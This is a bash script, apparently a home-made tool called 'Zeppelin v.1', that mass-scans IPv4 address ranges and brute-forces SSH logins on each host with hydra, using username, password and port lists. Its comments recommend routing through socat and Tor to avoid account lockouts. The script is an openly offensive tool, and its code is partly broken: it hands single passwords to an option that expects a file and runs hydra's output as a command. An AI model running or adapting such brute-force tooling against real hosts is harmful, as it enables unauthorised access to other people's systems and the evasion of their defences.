#!/bin/bash ################################################ # -=[Advanced Information Security Corp]=- ## ################################################ # Keeping things simple! # list of usernames in username.lst # list of passwords in wordlist.lst # list of ports to scan in portnumber.txt # for sem parallel check www.gnu.org/s/parallel # to prevent account lockouts you can use # socat+tor with refresh intervals to replicate. # # ./zep.sh x x x x OLDIFS=$IFS IFS=$'\n'; set -f echo " ~ Zeppelin v.1 SSH Bruteforce ~ " echo " _..--=--..._ " echo " .-' '-. .-. " echo " /.' '.\/ / " echo " |=- -=| ( " echo " \'. .'/\ \ " echo " '-.,_____ _____.-' '-' " echo " [_____]=8 " echo " " echo "-----------------------------------" echo "-=[Advanced Information Security]=-" echo "-----------------------------------" for ((x = $1; x < 255; x++)); do for ((y = $2; y < 255; y++)); do for ((z = $3; z < 255; z++)); do for ((f = $4; f < 255; f++)); do for a in $(cat username.lst); do for e in $(cat wordlist.lst); do for p in $(cat portnumber.txt); do class=$x.$y.$z.$f parallel=40 hydra=`hydra -l "$a" -P "$e" -t 7 -w 5 -s "$p" -f "$class" ssh & ` #hydra=`sem -j "$parallel" hydra -l "$a" -P "$e" -t 7 -w 5 -s "$p" -f "$class" ssh` echo " [~] ~ Attacking $x.$y.$z.$f with username: $a password: $e" $hydra done; wait done; done; done; done; done; done IFS=$OLDIFS set +f